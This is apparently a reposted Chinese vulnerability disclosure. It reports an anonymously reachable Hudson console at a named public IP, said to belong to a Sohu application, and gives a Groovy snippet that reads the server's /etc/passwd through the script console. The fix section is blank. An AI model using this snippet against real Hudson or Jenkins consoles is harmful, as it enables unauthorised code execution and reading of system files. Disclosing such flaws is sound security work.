hudson管理软件,管理地址对外,而且可以匿名访问:
http://220.181.26.142:8080/
好象主要是做cvs服务的:
这个管理软件不太了解,找到个可以执行Groovy命令的地方(查了一下Groovy,与java代码类似):
执行Groovy代码,读取服务器本地/etc/passwd文件:
try{
text = new File("/etc/passwd").getText();
out.print text
} catch(Exception e){
}
修复方案:
刚看了一下,如果都这样的话,有压力啊!
查看更多关于搜狐某应用远程Groovy代码执行 - 网站安全 - 自学的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did13964